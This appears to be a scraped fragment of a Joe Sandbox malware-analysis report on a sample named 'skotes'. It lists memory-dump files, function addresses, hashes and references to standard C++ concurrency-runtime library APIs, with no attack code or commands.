Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 6ddcf678c458c8b66852c268a59070eb1e0a8c66c4774fa918808e5e9a37f90a
Instruction ID: 818040786a4d8578c622ae6fc804dfa05c4a971ae98c7ce47ee43c0b3ad0c020
Opcode Fuzzy Hash: 6ddcf678c458c8b66852c268a59070eb1e0a8c66c4774fa918808e5e9a37f90a
Instruction Fuzzy Hash: 5431BE75B01210AFCB09DF54C884FADB7AAAF89304F15409AE8169B392CB75ED41CB92

Function 009686C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 009686EE

Part of subcall function 0095EAD0: _SpinWait.LIBCONCRT ref: 0095EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00968702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00968734
List.LIBCMT ref: 009687B7
List.LIBCMT ref: 009687C6

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 0ffd73924e4d5c433d41218d0898e7406d896f05f471db6f83aca3d9fa0be901
Instruction ID: 5c49a857eab438064fad428b0e7bd1d6b596e3530aaf81ecc75dd9a0b111f4b4
Opcode Fuzzy Hash: 0ffd73924e4d5c433d41218d0898e7406d896f05f471db6f83aca3d9fa0be901
Instruction Fuzzy Hash: 6F316972D05655DFCB24EFA8C5916EEB7B1BF44318F24026AD84277652CB31AE08CB94

Function 0097182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 009718A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 009718EB

Strings

pContext, xrefs: 0097189C

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 6aff9b57b54f9b823bb32ef9cd06f0d05919d5a3cafab96f96a083e65093dd97
Instruction ID: 3bd1d0442186a3a7981272d61b20e2de86c8ab493cb65561829800babb2c8ba6
Opcode Fuzzy Hash: 6aff9b57b54f9b823bb32ef9cd06f0d05919d5a3cafab96f96a083e65093dd97
Instruction Fuzzy Hash: 6621F933B006159BCF14AB6CD895BFD73A9BFD4334B04851AE519872D1CB64AC45CB92

Function 0096AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0096AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0096AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0096AF4E

Strings

pExecutionResource, xrefs: 0096AF07

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: bebbb6985db9cf3abd7858419d57d0823cade070ae8d3931320e24f006c85111
Instruction ID: b81b08f04acc3c65bbb843962b12b5382487a080d9367f88bd97e5fd2955ba74
Opcode Fuzzy Hash: bebbb6985db9cf3abd7858419d57d0823cade070ae8d3931320e24f006c85111
Instruction Fuzzy Hash: 9721AB756413059FCF14EF64C852BADB7A5BFC8314F144019F905A7382DBB1AE05CB95

Function 00964EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00964F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00964F66

Strings

ppVirtualProcessorRoots, xrefs: 00964F1C
count, xrefs: 00964EBA

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
